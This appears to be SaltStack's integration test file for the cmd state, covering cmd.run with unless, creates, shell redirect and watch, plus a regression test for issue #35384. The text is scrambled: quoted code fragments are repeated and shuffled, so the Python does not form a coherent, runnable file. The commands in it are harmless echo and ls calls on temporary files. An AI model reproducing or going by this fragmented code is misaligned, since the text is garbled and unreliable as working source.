cwd=tempfile.gettempdir()) self.assertSaltTrueReturn(ret) def test_test_run_simple(self): ''' cmd.run test interface", "OSError as exc: if exc.errno != errno.EBADF: raise exc #", "self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) # Create the", "as fb_: fb_.write(textwrap.dedent(''' saltines: cmd.run: - name: echo changed=true -", "''' cmd = 'dir' if IS_WINDOWS else 'ls' ret =", "command succeeded, # which is the bug we're regression testing", "the fix for issue #35384. (The fix is in PR", "self.state_name = 'run_watch' state_filename = self.state_name + '.sls' self.state_file =", "the state. 
If the comment reads \"unless execution succeeded\", or", "similar, # then the unless state run bailed out after", "first unless command succeeded, # which is the bug we're", "release the handle fd, self.test_file = tempfile.mkstemp() try: os.close(fd) except", "tearDown(self): os.remove(self.state_file) super(CMDRunWatchTest, self).tearDown() def test_run_watch(self): ''' test cmd.run watch", "SaltReturnAssertsMixin): ''' Validate the cmd state ''' def test_run_simple(self): '''", "from tests.support.paths import TMP_STATE_TREE from tests.support.mixins import SaltReturnAssertsMixin # Import", "/ - stateful: True biscuits: cmd.wait: - name: echo biscuits", "''' def test_run_simple(self): ''' cmd.run ''' cmd = 'dir' if", "state_key = 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w')", "we want to remove # As some of the tests", "want to remove # As some of the tests create", "out after the first unless command succeeded, # which is", "self.state_name = 'run_redirect' state_filename = self.state_name + '.sls' self.state_file =", "echo changed=true - cwd: / - stateful: True biscuits: cmd.wait:", "IS_WINDOWS else 'ls' ret = self.run_state('cmd.run', name=cmd, cwd=tempfile.gettempdir()) self.assertSaltTrueReturn(ret) def", "try: os.remove(path) except OSError: # Not all of the tests", "test interface ''' ret = self.run_state('cmd.run', name='ls', cwd=tempfile.gettempdir(), test=True) self.assertSaltNoneReturn(ret)", "file state tree. pass super(CMDRunRedirectTest, self).tearDown() def test_run_unless(self): ''' test", "watch ''' saltines_key = 'cmd_|-saltines_|-echo changed=true_|-run' biscuits_key = 'cmd_|-biscuits_|-echo biscuits_|-wait'", "{0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo test >", "[self.state_name]) self.assertTrue(ret[state_key]['result']) def test_run_unless_multiple_cmds(self): ''' test cmd.run using multiple unless", "> {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo test", "''' state_key = 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent('''", "cmd state ''' def test_run_simple(self): ''' cmd.run ''' cmd =", "IS_WINDOWS = salt.utils.is_windows() class CMDTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd", "testfile and release the handle fd, self.test_file = tempfile.mkstemp() try:", "succeeded, # which is the bug we're regression testing for.", "''' Validate the cmd state of run_redirect ''' def setUp(self):", "state ''' # Import python libs from __future__ import absolute_import", "#35384. (The fix is in PR #35545.) 
''' sls =", "os import textwrap import tempfile # Import Salt Testing libs", "''' Validate the cmd state of run_watch ''' def setUp(self):", "(self.state_file, self.test_tmp_path, self.test_file): try: os.remove(path) except OSError: # Not all", "raise exc super(CMDRunRedirectTest, self).setUp() def tearDown(self): for path in (self.state_file,", "run_redirect ''' def setUp(self): self.state_name = 'run_redirect' state_filename = self.state_name", "Create the testfile and release the handle fd, self.test_file =", "sls = self.run_function('state.sls', mods='issue-35384') self.assertSaltTrueReturn(sls) # We must assert against", "import tempfile # Import Salt Testing libs from tests.support.case import", "= 'cmd_|-echo test > {0}_|-echo test > {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file,", "self.assertEqual(len(ret[state_key]['changes']), 4) def test_run_redirect(self): ''' test cmd.run with shell redirect", "-*- ''' Tests for the file state ''' # Import", "testing for. self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo \"hello\"_|-run']['comment'], 'Command \"echo \"hello\"\" run') def test_run_creates_exists(self):", "= self.run_state('cmd.run', name=cmd, cwd=tempfile.gettempdir()) self.assertSaltTrueReturn(ret) def test_test_run_simple(self): ''' cmd.run test", "[self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 0) def test_run_creates_new(self): ''' test cmd.run creates", "is the bug we're regression testing for. self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo \"hello\"_|-run']['comment'], 'Command", "'w') as fb_: fb_.write(textwrap.dedent(''' echo test > {0}: cmd.run '''.format(self.test_file)))", "where the first cmd in the list will pass, but", "in the list will pass, but the second will fail.", "salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo test > {0}: cmd.run", "[self.state_name]) self.assertTrue(ret[state_key]['result']) class CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state", "as exc: if exc.errno != errno.EBADF: raise exc super(CMDRunRedirectTest, self).setUp()", "last unless # command in the state. 
If the comment", "after the first unless command succeeded, # which is the", "the comment reads \"unless execution succeeded\", or similar, # then", "cwd: / - watch: - cmd: saltines ''')) ret =", "Validate the cmd state of run_watch ''' def setUp(self): self.state_name", "ret = self.run_state('cmd.run', name='ls', cwd=tempfile.gettempdir(), test=True) self.assertSaltNoneReturn(ret) class CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin):", "# Import python libs from __future__ import absolute_import import errno", "self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 0) def test_run_creates_new(self): ''' test cmd.run creates not", "in the test itself, # And some are using files", "the test itself, # And some are using files in", "then the unless state run bailed out after the first", "Testing libs from tests.support.case import ModuleCase from tests.support.paths import TMP_STATE_TREE", "run_watch ''' def setUp(self): self.state_name = 'run_watch' state_filename = self.state_name", "'cmd_|-biscuits_|-echo biscuits_|-wait' with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' saltines: cmd.run:", "def test_run_watch(self): ''' test cmd.run watch ''' saltines_key = 'cmd_|-saltines_|-echo", "cmd.run test interface ''' ret = self.run_state('cmd.run', name='ls', cwd=tempfile.gettempdir(), test=True)", "the cmd state ''' def test_run_simple(self): ''' cmd.run ''' cmd", "test_run_unless_multiple_cmds(self): ''' test cmd.run using multiple unless options where the", "to the last unless # command in the state. If", "as fb_: fb_.write(textwrap.dedent(''' echo >> {0}: cmd.run: - creates: {0}", "echo test > {0}: cmd.run '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name])", "the cmd state of run_redirect ''' def setUp(self): self.state_name =", "ret = self.run_state('cmd.run', name=cmd, cwd=tempfile.gettempdir()) self.assertSaltTrueReturn(ret) def test_test_run_simple(self): ''' cmd.run", "if exc.errno != errno.EBADF: raise exc # Create the testfile", "salt.utils IS_WINDOWS = salt.utils.is_windows() class CMDTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the", "'''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) class CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin): '''", "self).setUp() def tearDown(self): os.remove(self.state_file) super(CMDRunWatchTest, self).tearDown() def test_run_watch(self): ''' test", "'w') as fb_: fb_.write(textwrap.dedent(''' echo >> {0}: cmd.run: - creates:", "the bug we're regression testing for. self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo \"hello\"_|-run']['comment'], 'Command \"echo", "testfile and release the handle fd, self.test_tmp_path = tempfile.mkstemp() try:", "salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' saltines: cmd.run: - name: echo", "cmd.run creates already there ''' state_key = 'cmd_|-echo >> {0}_|-echo", "''' cmd.run test interface ''' ret = self.run_state('cmd.run', name='ls', cwd=tempfile.gettempdir(),", "test_test_run_simple(self): ''' cmd.run test interface ''' ret = self.run_state('cmd.run', name='ls',", "against the comment here to make sure the comment reads", "Import python libs from __future__ import absolute_import import errno import", "CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state of run_redirect '''", "test file state tree. 
pass super(CMDRunRedirectTest, self).tearDown() def test_run_unless(self): '''", "import absolute_import import errno import os import textwrap import tempfile", "fb_.write(textwrap.dedent(''' saltines: cmd.run: - name: echo changed=true - cwd: /", "cmd in the list will pass, but the second will", "''' test cmd.run unless ''' state_key = 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path) with salt.utils.fopen(self.state_file,", "for path in (self.state_file, self.test_tmp_path, self.test_file): try: os.remove(path) except OSError:", "as fb_: fb_.write(textwrap.dedent(''' echo test > {0}: cmd.run '''.format(self.test_file))) ret", "run. This ensures that we made it to the last", "are using files in the integration test file state tree.", "cmd.run creates not there ''' os.remove(self.test_file) state_key = 'cmd_|-echo >>", "state tree. pass super(CMDRunRedirectTest, self).tearDown() def test_run_unless(self): ''' test cmd.run", "files in the integration test file state tree. pass super(CMDRunRedirectTest,", "self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) def test_run_unless_multiple_cmds(self): ''' test", "Create the testfile and release the handle fd, self.test_tmp_path =", "errno.EBADF: raise exc super(CMDRunRedirectTest, self).setUp() def tearDown(self): for path in", "super(CMDRunWatchTest, self).tearDown() def test_run_watch(self): ''' test cmd.run watch ''' saltines_key", "- unless: echo cheese > {1} '''.format(self.test_tmp_path, self.test_file))) ret =", "state_filename = self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) super(CMDRunWatchTest,", "Tests for the file state ''' # Import python libs", "make sure the comment reads that the # command \"echo", "# We must assert against the comment here to make", "using files in the integration test file state tree. pass", "cmd.run using multiple unless options where the first cmd in", "it to the last unless # command in the state.", "comment reads \"unless execution succeeded\", or similar, # then the", "os.close(fd) except OSError as exc: if exc.errno != errno.EBADF: raise", "test_run_watch(self): ''' test cmd.run watch ''' saltines_key = 'cmd_|-saltines_|-echo changed=true_|-run'", "files in the test itself, # And some are using", "class CMDTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state ''' def", "- creates: {0} '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']),", "the tests leave files around that we want to remove", "Import salt libs import salt.utils IS_WINDOWS = salt.utils.is_windows() class CMDTest(ModuleCase,", "cwd: / - stateful: True biscuits: cmd.wait: - name: echo", "fb_: fb_.write(textwrap.dedent(''' {0}: cmd.run: - unless: echo cheese > {1}", "that we made it to the last unless # command", "cheese > {1} '''.format(self.test_tmp_path, self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result'])", "the tests create the sls files in the test itself,", "list will pass, but the second will fail. 
This tests", "creates not there ''' os.remove(self.test_file) state_key = 'cmd_|-echo >> {0}_|-echo", "- name: echo changed=true - cwd: / - stateful: True", "here to make sure the comment reads that the #", "tests leave files around that we want to remove #", "name: echo biscuits - cwd: / - watch: - cmd:", "= self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) def test_run_unless_multiple_cmds(self): ''' test cmd.run using", "'Command \"echo \"hello\"\" run') def test_run_creates_exists(self): ''' test cmd.run creates", "{0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo >> {0}:", "setUp(self): self.state_name = 'run_redirect' state_filename = self.state_name + '.sls' self.state_file", "self.test_tmp_path, self.test_file): try: os.remove(path) except OSError: # Not all of", "As some of the tests create the sls files in", "= os.path.join(TMP_STATE_TREE, state_filename) # Create the testfile and release the", "Validate the cmd state ''' def test_run_simple(self): ''' cmd.run '''", "the first unless command succeeded, # which is the bug", "state of run_redirect ''' def setUp(self): self.state_name = 'run_redirect' state_filename", "os.remove(path) except OSError: # Not all of the tests leave", "unless state run bailed out after the first unless command", "create the sls files in the test itself, # And", "saltines: cmd.run: - name: echo changed=true - cwd: / -", ">> {0}_|-echo >> {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent('''", "If the comment reads \"unless execution succeeded\", or similar, #", "SaltReturnAssertsMixin): ''' Validate the cmd state of run_watch ''' def", "multiple unless options where the first cmd in the list", "that the # command \"echo \"hello\"\" was run. This ensures", "TMP_STATE_TREE from tests.support.mixins import SaltReturnAssertsMixin # Import salt libs import", "self).tearDown() def test_run_unless(self): ''' test cmd.run unless ''' state_key =", "self).setUp() def tearDown(self): for path in (self.state_file, self.test_tmp_path, self.test_file): try:", "fb_.write(textwrap.dedent(''' echo test > {0}: cmd.run '''.format(self.test_file))) ret = self.run_function('state.sls',", "super(CMDRunWatchTest, self).setUp() def tearDown(self): os.remove(self.state_file) super(CMDRunWatchTest, self).tearDown() def test_run_watch(self): '''", "creates already there ''' state_key = 'cmd_|-echo >> {0}_|-echo >>", "class CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state of run_redirect", "test > {0}_|-echo test > {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as", "self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) class CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd", "to remove # As some of the tests create the", "in the integration test file state tree. pass super(CMDRunRedirectTest, self).tearDown()", "assert against the comment here to make sure the comment", "self.assertSaltNoneReturn(ret) class CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state of", "with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo test > {0}:", "This ensures that we made it to the last unless", "reads that the # command \"echo \"hello\"\" was run. This", "pass, but the second will fail. 
This tests the fix", "os.path.join(TMP_STATE_TREE, state_filename) # Create the testfile and release the handle", "''' cmd.run ''' cmd = 'dir' if IS_WINDOWS else 'ls'", "{0} '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 0) def", "exc: if exc.errno != errno.EBADF: raise exc # Create the", "test cmd.run unless ''' state_key = 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path) with salt.utils.fopen(self.state_file, 'w')", "''' test cmd.run creates not there ''' os.remove(self.test_file) state_key =", "self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 0) def test_run_creates_new(self): ''' test cmd.run", "options where the first cmd in the list will pass,", "bug we're regression testing for. self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo \"hello\"_|-run']['comment'], 'Command \"echo \"hello\"\"", "self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) super(CMDRunWatchTest, self).setUp() def", "the cmd state of run_watch ''' def setUp(self): self.state_name =", "all of the tests leave files around that we want", "stateful: True biscuits: cmd.wait: - name: echo biscuits - cwd:", "was run. This ensures that we made it to the", "import salt.utils IS_WINDOWS = salt.utils.is_windows() class CMDTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate", "\"hello\"\" was run. This ensures that we made it to", "''' test cmd.run with shell redirect ''' state_key = 'cmd_|-echo", "exc.errno != errno.EBADF: raise exc super(CMDRunRedirectTest, self).setUp() def tearDown(self): for", "os.path.join(TMP_STATE_TREE, state_filename) super(CMDRunWatchTest, self).setUp() def tearDown(self): os.remove(self.state_file) super(CMDRunWatchTest, self).tearDown() def", "test itself, # And some are using files in the", "issue #35384. (The fix is in PR #35545.) ''' sls", "self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo \"hello\"_|-run']['comment'], 'Command \"echo \"hello\"\" run') def test_run_creates_exists(self): ''' test", "unless options where the first cmd in the list will", ">> {0}: cmd.run: - creates: {0} '''.format(self.test_file))) ret = self.run_function('state.sls',", "interface ''' ret = self.run_state('cmd.run', name='ls', cwd=tempfile.gettempdir(), test=True) self.assertSaltNoneReturn(ret) class", "''' state_key = 'cmd_|-echo test > {0}_|-echo test > {0}_|-run'.format(self.test_file)", "'run_redirect' state_filename = self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename)", "= self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) class CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the", "''' def setUp(self): self.state_name = 'run_redirect' state_filename = self.state_name +", ">> {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo >>", "And some are using files in the integration test file", "we're regression testing for. 
self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo \"hello\"_|-run']['comment'], 'Command \"echo \"hello\"\" run')", "path in (self.state_file, self.test_tmp_path, self.test_file): try: os.remove(path) except OSError: #", "'dir' if IS_WINDOWS else 'ls' ret = self.run_state('cmd.run', name=cmd, cwd=tempfile.gettempdir())", "ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 4) def test_run_redirect(self): '''", "import SaltReturnAssertsMixin # Import salt libs import salt.utils IS_WINDOWS =", "self.run_function('state.sls', mods='issue-35384') self.assertSaltTrueReturn(sls) # We must assert against the comment", "fd, self.test_file = tempfile.mkstemp() try: os.close(fd) except OSError as exc:", "state ''' def test_run_simple(self): ''' cmd.run ''' cmd = 'dir'", "''' os.remove(self.test_file) state_key = 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file) with", "state_key = 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' {0}:", "the comment here to make sure the comment reads that", "'''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 0) def test_run_creates_new(self):", "cmd.run: - name: echo changed=true - cwd: / - stateful:", "test > {0}: cmd.run '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result'])", "''' ret = self.run_state('cmd.run', name='ls', cwd=tempfile.gettempdir(), test=True) self.assertSaltNoneReturn(ret) class CMDRunRedirectTest(ModuleCase,", "succeeded\", or similar, # then the unless state run bailed", "unless ''' state_key = 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path) with salt.utils.fopen(self.state_file, 'w') as fb_:", "fd, self.test_tmp_path = tempfile.mkstemp() try: os.close(fd) except OSError as exc:", "with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' {0}: cmd.run: - unless:", "self.assertSaltTrueReturn(sls) # We must assert against the comment here to", "from tests.support.case import ModuleCase from tests.support.paths import TMP_STATE_TREE from tests.support.mixins", "''' state_key = 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file,", "Validate the cmd state of run_redirect ''' def setUp(self): self.state_name", "integration test file state tree. pass super(CMDRunRedirectTest, self).tearDown() def test_run_unless(self):", "the second will fail. 
This tests the fix for issue", "fb_: fb_.write(textwrap.dedent(''' saltines: cmd.run: - name: echo changed=true - cwd:", "ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 0) def test_run_creates_new(self): '''", "test_run_unless(self): ''' test cmd.run unless ''' state_key = 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path) with", "0) def test_run_creates_new(self): ''' test cmd.run creates not there '''", "# Import Salt Testing libs from tests.support.case import ModuleCase from", "the first cmd in the list will pass, but the", "run') def test_run_creates_exists(self): ''' test cmd.run creates already there '''", "name: echo changed=true - cwd: / - stateful: True biscuits:", "raise exc # Create the testfile and release the handle", "tests.support.paths import TMP_STATE_TREE from tests.support.mixins import SaltReturnAssertsMixin # Import salt", "file state ''' # Import python libs from __future__ import", "not there ''' os.remove(self.test_file) state_key = 'cmd_|-echo >> {0}_|-echo >>", "# Create the testfile and release the handle fd, self.test_tmp_path", "# command \"echo \"hello\"\" was run. This ensures that we", "[self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 4) def test_run_redirect(self): ''' test cmd.run with", "the integration test file state tree. pass super(CMDRunRedirectTest, self).tearDown() def", "fix is in PR #35545.) ''' sls = self.run_function('state.sls', mods='issue-35384')", "for. self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo \"hello\"_|-run']['comment'], 'Command \"echo \"hello\"\" run') def test_run_creates_exists(self): '''", "python libs from __future__ import absolute_import import errno import os", "ModuleCase from tests.support.paths import TMP_STATE_TREE from tests.support.mixins import SaltReturnAssertsMixin #", "self).tearDown() def test_run_watch(self): ''' test cmd.run watch ''' saltines_key =", "libs from tests.support.case import ModuleCase from tests.support.paths import TMP_STATE_TREE from", "!= errno.EBADF: raise exc # Create the testfile and release", "# which is the bug we're regression testing for. self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo", "''' Tests for the file state ''' # Import python", "fb_: fb_.write(textwrap.dedent(''' echo test > {0}: cmd.run '''.format(self.test_file))) ret =", "tempfile # Import Salt Testing libs from tests.support.case import ModuleCase", "if IS_WINDOWS else 'ls' ret = self.run_state('cmd.run', name=cmd, cwd=tempfile.gettempdir()) self.assertSaltTrueReturn(ret)", "coding: utf-8 -*- ''' Tests for the file state '''", "''' saltines_key = 'cmd_|-saltines_|-echo changed=true_|-run' biscuits_key = 'cmd_|-biscuits_|-echo biscuits_|-wait' with", "creates: {0} '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 0)", "execution succeeded\", or similar, # then the unless state run", "but the second will fail. 
This tests the fix for", "\"hello\"\" run') def test_run_creates_exists(self): ''' test cmd.run creates already there", "'ls' ret = self.run_state('cmd.run', name=cmd, cwd=tempfile.gettempdir()) self.assertSaltTrueReturn(ret) def test_test_run_simple(self): '''", "= self.run_function('state.sls', mods='issue-35384') self.assertSaltTrueReturn(sls) # We must assert against the", "and release the handle fd, self.test_tmp_path = tempfile.mkstemp() try: os.close(fd)", "= self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 0) def test_run_creates_new(self): ''' test", "{1} '''.format(self.test_tmp_path, self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) def test_run_unless_multiple_cmds(self):", "state_key = 'cmd_|-echo test > {0}_|-echo test > {0}_|-run'.format(self.test_file) with", "> {0}_|-echo test > {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_:", "class CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state of run_watch", "OSError as exc: if exc.errno != errno.EBADF: raise exc super(CMDRunRedirectTest,", "self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) def test_run_unless_multiple_cmds(self): ''' test cmd.run using multiple", "saltines_key = 'cmd_|-saltines_|-echo changed=true_|-run' biscuits_key = 'cmd_|-biscuits_|-echo biscuits_|-wait' with salt.utils.fopen(self.state_file,", "fb_.write(textwrap.dedent(''' echo >> {0}: cmd.run: - creates: {0} '''.format(self.test_file))) ret", "> {1} '''.format(self.test_tmp_path, self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) def", "salt.utils.is_windows() class CMDTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state '''", "def tearDown(self): for path in (self.state_file, self.test_tmp_path, self.test_file): try: os.remove(path)", "the testfile and release the handle fd, self.test_file = tempfile.mkstemp()", "there ''' state_key = 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file) with", "handle fd, self.test_file = tempfile.mkstemp() try: os.close(fd) except OSError as", "some of the tests create the sls files in the", "test_run_simple(self): ''' cmd.run ''' cmd = 'dir' if IS_WINDOWS else", "self.assertEqual(len(ret[state_key]['changes']), 0) def test_run_creates_new(self): ''' test cmd.run creates not there", "comment reads that the # command \"echo \"hello\"\" was run.", "'w') as fb_: fb_.write(textwrap.dedent(''' saltines: cmd.run: - name: echo changed=true", "test cmd.run creates not there ''' os.remove(self.test_file) state_key = 'cmd_|-echo", "tests.support.mixins import SaltReturnAssertsMixin # Import salt libs import salt.utils IS_WINDOWS", "cwd=tempfile.gettempdir(), test=True) self.assertSaltNoneReturn(ret) class CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd", "state_filename) super(CMDRunWatchTest, self).setUp() def tearDown(self): os.remove(self.state_file) super(CMDRunWatchTest, self).tearDown() def test_run_watch(self):", "- cwd: / - stateful: True biscuits: cmd.wait: - name:", "shell redirect ''' state_key = 'cmd_|-echo test > {0}_|-echo test", "state. 
If the comment reads \"unless execution succeeded\", or similar,", "in (self.state_file, self.test_tmp_path, self.test_file): try: os.remove(path) except OSError: # Not", "cmd.run watch ''' saltines_key = 'cmd_|-saltines_|-echo changed=true_|-run' biscuits_key = 'cmd_|-biscuits_|-echo", "as exc: if exc.errno != errno.EBADF: raise exc # Create", "biscuits_key = 'cmd_|-biscuits_|-echo biscuits_|-wait' with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent('''", "self.state_file = os.path.join(TMP_STATE_TREE, state_filename) # Create the testfile and release", "\"echo \"hello\"\" run') def test_run_creates_exists(self): ''' test cmd.run creates already", "command \"echo \"hello\"\" was run. This ensures that we made", "setUp(self): self.state_name = 'run_watch' state_filename = self.state_name + '.sls' self.state_file", "try: os.close(fd) except OSError as exc: if exc.errno != errno.EBADF:", "/ - watch: - cmd: saltines ''')) ret = self.run_function('state.sls',", "echo >> {0}: cmd.run: - creates: {0} '''.format(self.test_file))) ret =", "+ '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) super(CMDRunWatchTest, self).setUp() def tearDown(self):", "name=cmd, cwd=tempfile.gettempdir()) self.assertSaltTrueReturn(ret) def test_test_run_simple(self): ''' cmd.run test interface '''", "os.remove(self.state_file) super(CMDRunWatchTest, self).tearDown() def test_run_watch(self): ''' test cmd.run watch '''", "= self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) # Create", "os.remove(self.test_file) state_key = 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file,", "ensures that we made it to the last unless #", "the list will pass, but the second will fail. This", "cmd.run unless ''' state_key = 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path) with salt.utils.fopen(self.state_file, 'w') as", "exc # Create the testfile and release the handle fd,", "the # command \"echo \"hello\"\" was run. This ensures that", "PR #35545.) ''' sls = self.run_function('state.sls', mods='issue-35384') self.assertSaltTrueReturn(sls) # We", "run bailed out after the first unless command succeeded, #", "test cmd.run using multiple unless options where the first cmd", "of run_redirect ''' def setUp(self): self.state_name = 'run_redirect' state_filename =", "{0}_|-echo test > {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent('''", "absolute_import import errno import os import textwrap import tempfile #", "''' Validate the cmd state ''' def test_run_simple(self): ''' cmd.run", "will fail. This tests the fix for issue #35384. (The", "# then the unless state run bailed out after the", "True biscuits: cmd.wait: - name: echo biscuits - cwd: /", "\"unless execution succeeded\", or similar, # then the unless state", "#35545.) ''' sls = self.run_function('state.sls', mods='issue-35384') self.assertSaltTrueReturn(sls) # We must", "is in PR #35545.) 
''' sls = self.run_function('state.sls', mods='issue-35384') self.assertSaltTrueReturn(sls)", "the handle fd, self.test_file = tempfile.mkstemp() try: os.close(fd) except OSError", "Import Salt Testing libs from tests.support.case import ModuleCase from tests.support.paths", "libs import salt.utils IS_WINDOWS = salt.utils.is_windows() class CMDTest(ModuleCase, SaltReturnAssertsMixin): '''", "of the tests leave files around that we want to", "state run bailed out after the first unless command succeeded,", "salt libs import salt.utils IS_WINDOWS = salt.utils.is_windows() class CMDTest(ModuleCase, SaltReturnAssertsMixin):", "-*- coding: utf-8 -*- ''' Tests for the file state", "the testfile and release the handle fd, self.test_tmp_path = tempfile.mkstemp()", "release the handle fd, self.test_tmp_path = tempfile.mkstemp() try: os.close(fd) except", "tests the fix for issue #35384. (The fix is in", "CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state of run_watch '''", "tearDown(self): for path in (self.state_file, self.test_tmp_path, self.test_file): try: os.remove(path) except", "import textwrap import tempfile # Import Salt Testing libs from", "'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' {0}: cmd.run: -", "if exc.errno != errno.EBADF: raise exc super(CMDRunRedirectTest, self).setUp() def tearDown(self):", "echo cheese > {1} '''.format(self.test_tmp_path, self.test_file))) ret = self.run_function('state.sls', [self.state_name])", "exc.errno != errno.EBADF: raise exc # Create the testfile and", "test_run_creates_exists(self): ''' test cmd.run creates already there ''' state_key =", "''' test cmd.run using multiple unless options where the first", "SaltReturnAssertsMixin): ''' Validate the cmd state of run_redirect ''' def", "sure the comment reads that the # command \"echo \"hello\"\"", "in the state. If the comment reads \"unless execution succeeded\",", "made it to the last unless # command in the", "\"echo \"hello\"\" was run. This ensures that we made it", "the unless state run bailed out after the first unless", "the handle fd, self.test_tmp_path = tempfile.mkstemp() try: os.close(fd) except OSError", "def setUp(self): self.state_name = 'run_redirect' state_filename = self.state_name + '.sls'", "4) def test_run_redirect(self): ''' test cmd.run with shell redirect '''", "else 'ls' ret = 